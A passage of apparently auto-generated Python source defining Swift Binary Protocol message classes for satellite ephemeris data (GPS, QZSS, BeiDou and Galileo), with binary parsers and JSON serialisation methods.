self.sender = kwargs.pop('sender', SENDER_ID)
self.x = kwargs.pop('x')
self.y = kwargs.pop('y')
self.z = kwargs.pop('z')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgBasePosECEF.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgBasePosECEF(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgBasePosECEF._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgBasePosECEF._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgBasePosECEF._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgBasePosECEF, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GPS_DEP_E = 0x0081
class MsgEphemerisGPSDepE(SBP):
"""SBP class for message MSG_EPHEMERIS_GPS_DEP_E (0x0081).
You can have MSG_EPHEMERIS_GPS_DEP_E inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GPS satellite position,
velocity, and clock offset. Please see the Navstar GPS
Space Segment/Navigation user interfaces (ICD-GPS-200, Table
20-III) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepA
Values common for all ephemeris types
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeDep
Clock reference
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepA._parser),
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toc' / construct.Struct(GPSTimeDep._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGPSDepE,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGPSDepE, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GPS_DEP_E
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGPSDepE.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGPSDepE(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGPSDepE._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGPSDepE._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGPSDepE._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGPSDepE, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GPS_DEP_F = 0x0086
class MsgEphemerisGPSDepF(SBP):
"""SBP class for message MSG_EPHEMERIS_GPS_DEP_F (0x0086).
You can have MSG_EPHEMERIS_GPS_DEP_F inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
ephemeris message using floats for size reduction.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepB
Values common for all ephemeris types
tgd : double
Group delay differential between L1 and L2
c_rs : double
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : double
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : double
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : double
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : double
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : double
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : double
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepB._parser),
'tgd' / construct.Float64l,
'c_rs' / construct.Float64l,
'c_rc' / construct.Float64l,
'c_uc' / construct.Float64l,
'c_us' / construct.Float64l,
'c_ic' / construct.Float64l,
'c_is' / construct.Float64l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float64l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGPSDepF,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGPSDepF, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GPS_DEP_F
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGPSDepF.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGPSDepF(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGPSDepF._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGPSDepF._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGPSDepF._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGPSDepF, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GPS = 0x008A
class MsgEphemerisGPS(SBP):
"""SBP class for message MSG_EPHEMERIS_GPS (0x008A).
You can have MSG_EPHEMERIS_GPS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GPS satellite position,
velocity, and clock offset. Please see the Navstar GPS
Space Segment/Navigation user interfaces (ICD-GPS-200, Table
20-III) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
tgd : float
Group delay differential between L1 and L2
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : float
Polynomial clock correction coefficient (clock bias)
af1 : float
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'tgd' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float32l,
'af1' / construct.Float32l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGPS,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGPS, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GPS
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGPS.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGPS(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGPS._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGPS._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGPS._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGPS, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_QZSS = 0x008E
class MsgEphemerisQzss(SBP):
"""SBP class for message MSG_EPHEMERIS_QZSS (0x008E).
You can have MSG_EPHEMERIS_QZSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate QZSS satellite position,
velocity, and clock offset.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
tgd : float
Group delay differential between L1 and L2
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : float
Polynomial clock correction coefficient (clock bias)
af1 : float
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of ephemeris data
iodc : int
Issue of clock data
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'tgd' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float32l,
'af1' / construct.Float32l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'tgd',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisQzss,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisQzss, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_QZSS
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.tgd = kwargs.pop('tgd')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisQzss.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisQzss(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisQzss._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisQzss._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisQzss._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisQzss, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_BDS = 0x0089
class MsgEphemerisBds(SBP):
"""SBP class for message MSG_EPHEMERIS_BDS (0x0089).
You can have MSG_EPHEMERIS_BDS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate BDS satellite position,
velocity, and clock offset. Please see the BeiDou Navigation
Satellite System SIS-ICD Version 2.1, Table 5-9 for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
tgd1 : float
Group delay differential for B1
tgd2 : float
Group delay differential for B2
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : float
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of ephemeris data
Calculated from the navigation data parameter t_oe per RTCM/CSNO recommendation:
IODE = mod (t_oe / 720, 240)
iodc : int
Issue of clock data
Calculated from the navigation data parameter t_oe per RTCM/CSNO recommendation:
IODE = mod (t_oc / 720, 240)
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'tgd1' / construct.Float32l,
'tgd2' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float32l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int8ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'tgd1',
'tgd2',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisBds,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisBds, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_BDS
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.tgd1 = kwargs.pop('tgd1')
self.tgd2 = kwargs.pop('tgd2')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisBds.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisBds(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisBds._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisBds._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisBds._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisBds, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GAL_DEP_A = 0x0095
class MsgEphemerisGalDepA(SBP):
"""SBP class for message MSG_EPHEMERIS_GAL_DEP_A (0x0095).
You can have MSG_EPHEMERIS_GAL_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
an ephemeris message with explicit source of NAV data.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
bgd_e1e5a : float
E1-E5a Broadcast Group Delay
bgd_e1e5b : float
E1-E5b Broadcast Group Delay
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of data (IODnav)
iodc : int
Issue of data (IODnav). Always equal to iode
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'bgd_e1e5a' / construct.Float32l,
'bgd_e1e5b' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int16ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'bgd_e1e5a',
'bgd_e1e5b',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGalDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGalDepA, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GAL_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.bgd_e1e5a = kwargs.pop('bgd_e1e5a')
self.bgd_e1e5b = kwargs.pop('bgd_e1e5b')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
